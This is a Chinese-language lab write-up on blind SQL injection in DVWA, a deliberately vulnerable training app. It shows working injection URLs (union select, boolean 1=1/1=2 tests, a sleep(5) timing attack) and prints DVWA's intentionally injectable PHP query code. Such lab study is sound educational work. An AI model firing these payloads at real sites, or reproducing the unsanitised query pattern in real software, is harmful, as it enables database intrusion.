[基本实验] Web漏洞演示系统中的SQL盲注漏洞

盲注与非盲注的对比
在DVWA中有两个实验，分别是SQL盲注和SQL非盲注，通过实验对比二者的不同，可以体会盲注的什么样子的。
非盲注时：
http://10.0.3.9/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
可见界面中出现了提示错误的信息。

盲注时：
http://10.0.3.9/dvwa/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#
可见界面无任何异常变化。



在通过order by判断了SQL语句中存在两列之后
非盲注时：
http://10.0.3.9/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,2%20--%20&Submit=Submit#
可见能够找到回显的位置
盲注时：
http://10.0.3.9/dvwa/vulnerabilities/sqli_blind/?id=1%27%20union%20select%201,2%20--%20&Submit=Submit#
也可见回显的位置
至此可知，在本例中盲注和非盲注的区别不在于是否能够在网页上回显信息，而是在构造异常判断是否存在SQL注入漏洞时，页面有没有相应的反应。


bool注入
http://10.0.3.9/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=1 -- &Submit=Submit#
页面能正常显示

http://10.0.3.9/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=2 -- &Submit=Submit#
页面什么也不再显示了。


timing attack
http://10.0.3.9/dvwa/vulnerabilities/sqli_blind/?id=1' union select sleep(5),2 -- &Submit=Submit#

经过5秒钟，出现如下的页面。

<?php     
#LOW LEVEL
if (isset($_GET['Submit'])) { 
    // Retrieve data 
    $id = $_GET['id']; 
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    $result = mysql_query($getid); // Removed 'or die' to suppres mysql errors 
    $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' 
    $i = 0; 
    while ($i < $num) { 
        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 
        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 
        $i++; 
    } 
} 
?>

<?php 
#MID LEVEL
if (isset($_GET['Submit'])) { 
    // Retrieve data 
    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
    $result = mysql_query($getid); // Removed 'or die' to suppres mysql errors 
    $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' 
    $i=0; 
    while ($i < $num) { 
        $first=mysql_result($result,$i,"first_name"); 
        $last=mysql_result($result,$i,"last_name"); 
        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 
        $i++; 
    } 
} 
?>


<?php     
#HIGH LEVEL
if(isset($_GET['Submit'])){ 
    // Retrieve data 
    $id = $_GET['id']; 
    $id = stripslashes($id); 
    $id = mysql_real_escape_string($id); 
    if (is_numeric($id)) { 
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
        $result = mysql_query($getid); // Removed 'or die' to suppres mysql errors 
        $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' 
        $i=0; 
        while ($i < $num) { 
            $first = mysql_result($result,$i,"first_name"); 
            $last = mysql_result($result,$i,"last_name"); 
            echo '<pre>'; 
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
            echo '</pre>'; 
            $i++; 
        } 
    } 
} 
?>